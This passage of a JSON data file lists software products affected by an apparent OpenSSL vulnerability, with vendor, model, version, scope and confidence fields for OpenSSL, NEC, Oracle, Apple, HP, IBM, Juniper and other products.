      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0n"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1g"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0j"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0g"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0r"
      },
      {
        "model": "openssl",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "0.9.8zf"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1k"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1f"
      },
      {
        "model": "junos 12.1x44-d20",
        "scope": null,
        "trust": 0.9,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "istorage",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "hs series all versions"
      },
      {
        "model": "supply chain products suite",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle transportation management 6.2"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle secure global desktop 5.2"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.9.5"
      },
      {
        "model": "hpe systems insight manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.01"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "application navigator probe option ver3.1.0.x to  ver4.1.0.x"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.0"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.02"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "foundation v8.2 to  v8.5"
      },
      {
        "model": "webotx sip application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "st ard edition v7.1 to  v8.1"
      },
      {
        "model": "univerge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "3c cmm"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "enterprise v8.2 to  v9.2"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.8.5"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle secure global desktop 4.63"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "application navigator agent ver3.3 to  ver4.1"
      },
      {
        "model": "webotx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "enterprise edition v4.2 to  v6.5"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle secure global desktop 4.71"
      },
      {
        "model": "hpe server migration pack",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "enterprisedirectoryserver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver8.0"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "express v8.2 to  v9.2"
      },
      {
        "model": "peoplesoft products",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  peoplesoft enterprise peopletools 8.54"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.0"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "st ard edition v7.1"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.10 to  10.10.4"
      },
      {
        "model": "ix2000 series",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.0"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.1"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v6.2"
      },
      {
        "model": "univerge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "3c ucm"
      },
      {
        "model": "supply chain products suite",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle transportation management 6.1"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "enterprise edition v7.1"
      },
      {
        "model": "e-business suite",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "11.5.10.2"
      },
      {
        "model": "hpe insight control",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "none"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  sg3600lm/lg/lj v6.1"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "st ard-j edition v7.1 to  v8.1"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "systemmanager ver5.5.2 to  ver6.2.1"
      },
      {
        "model": "peoplesoft products",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  peoplesoft enterprise peopletools 8.53"
      },
      {
        "model": "hpe version control repository manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  intersecvm/sg v1.2"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v7.0"
      },
      {
        "model": "webotx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "web edition v4.1 to  v6.5"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "st ard v8.2 to  v9.2"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "jobcenter r14.1"
      },
      {
        "model": "hpe matrix operating environment",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "istorage",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "nv7500/nv5500/nv3500 series"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v7.1"
      },
      {
        "model": "webotx enterprise service bus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v6.4 to  v9.2"
      },
      {
        "model": "webotx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "st ard-j edition v4.1 to  v6.5"
      },
      {
        "model": "istorage",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "nv7400/nv5400/nv3400 series"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "application navigator manager ver3.2.2 to  ver4.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2b"
      },
      {
        "model": "webotx portal",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.2 to  v9.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1n"
      },
      {
        "model": "webotx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "st ard edition v4.2 to  v6.5"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v4.0"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "mcoperations ver3.6.2 to  ver4.2"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "system management homepage",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "web edition v7.1 to  v8.1"
      },
      {
        "model": "ix3000 series",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "hpe insight control",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "server provisioning"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.1"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle exalogic infrastructure eecs 2.0.6.2.3"
      },
      {
        "model": "webotx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "uddi registry v1.1 to  v7.1"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  univerge sg3000lg/lj"
      },
      {
        "model": "capssuite",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.0 to  v4.0 manager component"
      },
      {
        "model": "junos 12.1x46-d25",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.1"
      },
      {
        "model": "db2 advanced enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.2.0.5"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.10"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.14"
      },
      {
        "model": "db2 express edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "security network controller 1.0.3361m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.11"
      },
      {
        "model": "security access manager for web appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3.0.0"
      },
      {
        "model": "db2 workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.2"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "db2\u00ae connect? unlimited edition for system z\u00ae",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.6"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.211"
      },
      {
        "model": "db2 connect unlimited edition for system i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.6"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "8.53"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.12"
      },
      {
        "model": "tivoli netcool system service monitor fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0.2"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.4.1.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.18"
      },
      {
        "model": "junos 12.1x44-d33",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.8.0.0"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.15"
      },
      {
        "model": "project openssl 1.0.0d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "db2 connect unlimited edition for system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "hp-ux b.11.22",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "project openssl 1.0.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "insight orchestration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "i v5r4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.18"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "project openssl 1.0.1a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "db2\u00ae express edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "cloud orchestrator enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.0.3"
      },
      {
        "model": "project openssl b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "junos 14.1r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.6"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.1"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.13"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.2.2"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.4.0.6"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.3.0.12"
      },
      {
        "model": "version control agent",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "worklight foundation consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.20"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.14"
      },
      {
        "model": "junos 13.3r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.15"
      },
      {
        "model": "abyp-4tl-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.2"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.2"
      },
      {
        "model": "db2\u00ae connect? application server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1209"
      },
      {
        "model": "project openssl k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.5"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.24"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "i v5r3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "db2 luw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5.0.6"
      },
      {
        "model": "netinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6.0"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.04"
      },
      {
        "model": "db2 connect enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "cloud orchestrator enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.0.2"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0.4"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.5.0.2"
      },
      {
        "model": "ascenlink",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "7.2.3"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.8"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37006.4.19"
      },
      {
        "model": "insight control server provisioning",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "junos 12.1x44-d35",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "sterling integrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3361"
      },
      {
        "model": "hp-ux b.11.04",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "junos 12.1x44-d51",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "general parallel file system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.7"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.7"
      },
      {
        "model": "sametime",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.2"
      },
      {
        "model": "netscaler t1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "worklight foundation enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.20"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.6"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.12"
      },
      {
        "model": "workflow for bluemix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.4.0.5"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "db2\u00ae connect? unlimited edition for system i\u00ae",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "junos 12.1x44-d34",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 13.3r6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.17"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.7"
      },
      {
        "model": "imc products",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.4"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37001.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.9"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.2.77"
      },
      {
        "model": "junos 12.1x47-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "gpfs storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.4"
      },
      {
        "model": "websphere transformation extender secure adapter collection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.1.3"
      },
      {
        "model": "junos 12.1x44-d50",
        "scope": null,
        "trust": 0.3,
